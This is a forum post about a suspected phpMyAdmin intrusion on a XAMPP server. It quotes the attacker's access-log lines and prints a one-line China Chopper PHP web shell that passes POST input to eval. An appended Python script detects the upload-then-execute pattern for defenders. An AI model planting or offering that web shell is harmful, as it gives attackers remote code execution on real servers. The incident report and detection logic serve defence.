Author: 山野木每子 | Source: Internet | 2022-12-31 09:21
OK, so I believe I have run into a security issue with the latest XAMPP (PHP 7.2.1), which ships with phpMyAdmin 4.7.4.
I found a file in my htdocs folder, wuwu11.php, containing a single line, as shown below.
I looked at the access log and found the following:
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin/ HTTP/1.1" 200 13732 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:58 -0600] "POST /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13191 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:04:59 -0600] "GET /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13640 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:00 -0600] "GET /phpinfo.php HTTP/1.1" 401 1299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:01 -0600] "GET /index.php HTTP/1.1" 401 1297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /dashboard/phpinfo.php HTTP/1.1" 401 1309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /u.php?act=phpinfo HTTP/1.1" 401 1293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:03 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 368 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:05 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 9663 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:06 -0600] "POST /phpmyadmin/export.php HTTP/1.1" 500 888 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:07 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 10223 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:08 -0600] "GET /wuwu11.php HTTP/1.1" 401 1298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
The last line ends with a request for the php file, which appears to have been uploaded via phpmyadmin/import.php.
In my research I found that this is related to the China Chopper hacking kit. The IP in these access logs maps to Fuzhou, Fujian, China.
Found the code <?php @eval($_POST['pass']);?> on a WordPress site.
Luckily I had set my root directory to something other than XAMPP's default htdocs folder, otherwise I guess the attacker would have been able to execute code, do some damage and then delete the file themselves.
Wondering whether anyone has seen this before or has more insight, as it seems I am right and the attacker is exploiting phpMyAdmin.
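Detection logic for the pattern described in this post, as an added example that is not part of the original post or of phpMyAdmin/XAMPP. It parses Apache combined-format access-log lines (seven lines quoted from the log above plus one constructed benign request from the 192.0.2.0/24 documentation range) and flags two things a defender would want to see: a client that POSTs to phpMyAdmin's import.php and shortly afterwards requests a .php file outside /phpmyadmin (a freshly dropped script), and a client that switches between several User-Agent strings in one session (the scripted Apache-HttpClient requests interleaved with a Firefox UA). The function names, the 120-second window and the /phpmyadmin/ prefix are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["path"] = e["path"].split("?", 1)[0]  # drop the query string (e.g. ?token=...)
    return e


def parse_log(text):
    """Parse all lines, skipping unparseable ones, and return them in time order."""
    entries = (parse_line(line) for line in text.splitlines() if line.strip())
    return sorted((e for e in entries if e), key=lambda e: e["ts"])


def find_upload_then_exec(entries, window_seconds=120, admin_prefix="/phpmyadmin/"):
    """Flag a GET of a .php file outside admin_prefix that follows, from the same
    client and within window_seconds, a POST to <admin_prefix>import.php.
    Each (ip, path) pair is reported once, measured from that client's most
    recent import.php POST (assumed heuristic, not a phpMyAdmin feature)."""
    last_import = {}   # ip -> timestamp of the client's latest import.php POST
    seen = set()
    findings = []
    for e in entries:
        if e["method"] == "POST" and e["path"] == admin_prefix + "import.php":
            last_import[e["ip"]] = e["ts"]
            continue
        if e["method"] != "GET" or not e["path"].endswith(".php"):
            continue
        if e["path"].startswith(admin_prefix):
            continue   # ordinary phpMyAdmin navigation, not a dropped script
        t = last_import.get(e["ip"])
        if t is None:
            continue
        delta = (e["ts"] - t).total_seconds()
        if delta <= window_seconds and (e["ip"], e["path"]) not in seen:
            seen.add((e["ip"], e["path"]))
            findings.append({"ip": e["ip"], "path": e["path"],
                             "seconds_after_import": delta, "status": e["status"]})
    return findings


def multi_agent_ips(entries):
    """IPs that presented more than one User-Agent string: a browser UA mixed
    with a scripted client (Apache-HttpClient in the post) is a tooling fingerprint."""
    agents = defaultdict(set)
    for e in entries:
        agents[e["ip"]].add(e["ua"])
    return sorted(ip for ip, uas in agents.items() if len(uas) > 1)


# Seven lines quoted from the post's access log, plus one constructed benign
# request (192.0.2.10, documentation address range) that must not be flagged.
SAMPLE_LOG = """\
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:58 -0600] "POST /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13191 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:00 -0600] "GET /phpinfo.php HTTP/1.1" 401 1299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:03 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 368 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:06 -0600] "POST /phpmyadmin/export.php HTTP/1.1" 500 888 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:07 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 10223 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:08 -0600] "GET /wuwu11.php HTTP/1.1" 401 1298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.0.2.10 - - [21/Jan/2018:22:05:09 -0600] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
"""

if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    for f in find_upload_then_exec(log):
        print("upload-then-exec: %(ip)s fetched %(path)s %(seconds_after_import).0fs "
              "after an import.php POST (status %(status)d)" % f)
    print("clients with mixed User-Agents:", multi_agent_ips(log))
```

Run against the post's excerpt this reports one upload-then-exec finding (27.155.87.26 fetching /wuwu11.php one second after its last import.php POST) and one client with mixed User-Agents; the earlier probe for /phpinfo.php is not flagged because no import POST precedes it. The finding carries the response status so an analyst can see at a glance whether the dropped script was actually served (200) or refused, as with the 401 in the post; the phpMyAdmin navigation requests themselves are excluded by the prefix check so that routine admin use does not trip the rule.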